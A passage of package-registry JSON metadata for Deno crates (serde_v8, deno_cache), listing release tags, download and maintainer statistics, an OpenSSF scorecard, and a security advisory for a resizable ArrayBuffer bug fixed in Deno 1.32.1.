/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-01T13:55:35.085Z","dependent_packages_count":11,"downloads":17865088,"downloads_period":"total","dependent_repos_count":356,"rankings":{"downloads":2.542171183768185,"dependent_repos_count":2.1896290125844167,"dependent_packages_count":3.531356329712384,"stargazers_count":12.09799779847083,"forks_count":9.989577129243598,"docker_downloads_count":3.236226684728404,"average":5.597826356417969},"purl":"pkg:cargo/serde_v8","advisories":[{"uuid":"GSA_kwCzR0hTQS1jMjV4LWNtOXgtcXFneM4AAyRG","url":"https://github.com/advisories/GHSA-c25x-cm9x-qqgx","title":"Deno improperly handles resizable ArrayBuffer","description":"### Impact\n\n[Resizable ArrayBuffers](https://github.com/tc39/proposal-resizablearraybuffer) passed to asynchronous native functions that are shrunk during the asynchronous operation could result in an out-of-bound read/write.\n\nIt is unlikely that this has been exploited in the wild, as the only version affected is Deno 1.32.0.\n\nDeno Deploy users are not affected.\n\n### Patches\n\nThe problem has been resolved by disabling resizable ArrayBuffers temporarily in Deno 1.32.1. A future version of Deno will re-enable resizable ArrayBuffers with a proper fix.\n\n### Workarounds\n\nUpgrade to Deno 1.32.1, or run with `--v8-flags=--no-harmony-rab-gsab` to disable resizable ArrayBuffers.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2023-03-23T23:13:25.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.9,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-c25x-cm9x-qqgx","https://github.com/denoland/deno/pull/18395","https://github.com/denoland/deno/releases/tag/v1.32.1","https://nvd.nist.gov/vuln/detail/CVE-2023-28445","https://github.com/denoland/deno/pull/18452","https://github.com/advisories/GHSA-c25x-cm9x-qqgx"],"source_kind":"github","identifiers":["GHSA-c25x-cm9x-qqgx","CVE-2023-28445"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2023-03-24T00:03:53.363Z","updated_at":"2026-09-01T18:12:32.825Z","epss_percentage":0.00971,"epss_percentile":0.585,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jMjV4LWNtOXgtcXFneM4AAyRG","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1jMjV4LWNtOXgtcXFneM4AAyRG","packages":[{"ecosystem":"cargo","package_name":"deno_runtime","versions":[{"first_patched_version":"0.103.0","vulnerable_version_range":"= 0.102.0"}],"purl":"pkg:cargo/deno_runtime"},{"ecosystem":"cargo","package_name":"serde_v8","versions":[{"first_patched_version":"0.88.0","vulnerable_version_range":"= 0.87.0"}],"purl":"pkg:cargo/serde_v8"},{"ecosystem":"cargo","package_name":"Deno","versions":[{"first_patched_version":"1.32.1","vulnerable_version_range":"= 1.32.0"}],"purl":"pkg:cargo/Deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jMjV4LWNtOXgtcXFneM4AAyRG/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/serde_v8","docker_dependents_count":30,"docker_downloads_count":23282372,"usage_url":"https://repos.ecosyste.ms/usage/cargo/serde_v8","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/serde_v8/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-31T04:05:42.345Z","issues_count":6636,"pull_requests_count":9651,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":583,"issue_authors_count":2480,"avg_comments_per_issue":2.5051235684147075,"avg_comments_per_pull_request":0.7197181639208372,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1202,"past_year_avg_time_to_close_issue":1410952.7079646017,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":226,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":186,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.232488822652757,"past_year_avg_comments_per_pull_request":1.1123128119800334,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/serde_v8/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/serde_v8/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/serde_v8/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/serde_v8/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/serde_v8/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/serde_v8/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-08T01:03:52.167Z","updated_at":"2022-11-08T01:03:52.167Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:25.439Z","updated_at":"2023-07-18T22:41:25.439Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":5272210,"name":"deno_cache","ecosystem":"cargo","description":"Implementation of Cache API for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":191,"first_release_published_at":"2022-09-28T12:33:49.136Z","latest_release_published_at":"2026-08-27T15:22:16.684Z","latest_release_number":"0.191.0","last_synced_at":"2026-08-29T21:56:48.546Z","created_at":"2022-09-28T12:48:14.271Z","updated_at":"2026-08-30T02:55:29.994Z","registry_url":"https://crates.io/crates/deno_cache/","install_command":"cargo install deno_cache","documentation_url":"https://docs.rs/deno_cache/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction 